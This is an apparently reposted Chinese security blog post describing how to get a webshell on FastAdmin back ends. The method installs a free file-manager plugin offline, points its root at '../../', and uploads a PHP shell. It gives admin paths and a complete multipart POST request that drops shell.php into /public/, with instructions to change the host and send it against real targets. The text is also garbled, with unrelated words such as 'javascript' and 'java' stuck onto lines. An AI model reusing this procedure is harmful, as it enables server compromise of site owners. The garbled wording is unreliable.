0x01 前言javascript
FastAdmin是基于ThinkPHP5和Bootstrap的后台框架,能够利用三方插件GetShellphp
0x02 本地测试html
FastAdmin官方源码下载地址:
java
https://www.fastadmin.net/download.html
开启phpstudy本地搭建shell
安装成功,新版源码的后台地址是随机生成的
安全
后台默认会有插件管理功能,可是绝大部分用户会把这个功能阉割掉
微信
点进去看到有一堆付费和免费的插件
app
翻到了目前已有的三个官方发布的在线文件管理器插件,一个是官方付费版,一个是三方付费版框架
可是因为舍不得花十块钱买插件,全部只能用三方免费版插件,直接点击安装会须要登陆帐号,登陆信息会记录到日志,不便于操做,因此去官方下载离线安装包less
Fileix文件管理器离线安装包官方下载地址:
https://www.fastadmin.net/store/fileix.html
点击离线安装,选择上传你下载的ZIP离线安装包
插件安装完成会自动启用,默认路径配置是这样的
而后打开是这样的
能够修改成 ../../,那么再打开就是这样的
而后浅显易懂,直接右键上传php文件就能getshell
上面是本地测试环境,真实环境会出现这样一个问题,就是点击文件管理功能不会显示任何内容
后来了解一下是由于没有配置前台页面,不太好修改,因此利用下面的方法
0x03 通用方法
1.插件管理地址:
/admin/addon?ref=addtabs
进入后台默认不显示插件管理功能,访问插件管理地址,上传离线安装包
2.文件管理地址/读取全部文件地址:
/admin/fileix?ref=addtabs/admin/fileix/lst
真实环境中若是出现不显示功能的状况,必要时能够读取全部文件地址
3.上传poc:
POST /admin/fileix/data?target=%2F HTTP/1.1Host: localhostContent-Length: 1050Origin: http://localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrZmyeAB3SciJDWSTAccept: */*Referer: http://localhostAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=xxxxxxxxConnection: close
------WebKitFormBoundaryrZmyeAB3SciJDWSTContent-Disposition: form-data; name="upload"; filename="shell.php"Content-Type: application/octet-stream
code------WebKitFormBoundaryrZmyeAB3SciJDWSTContent-Disposition: form-data; name="action"
upload------WebKitFormBoundaryrZmyeAB3SciJDWSTContent-Disposition: form-data; name="target"
/public/------WebKitFormBoundaryrZmyeAB3SciJDWST--
修改host地址post过去
利用poc成功上传shell
本文分享自微信公众号 - WhITECat安全团队(WhITECat_007)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。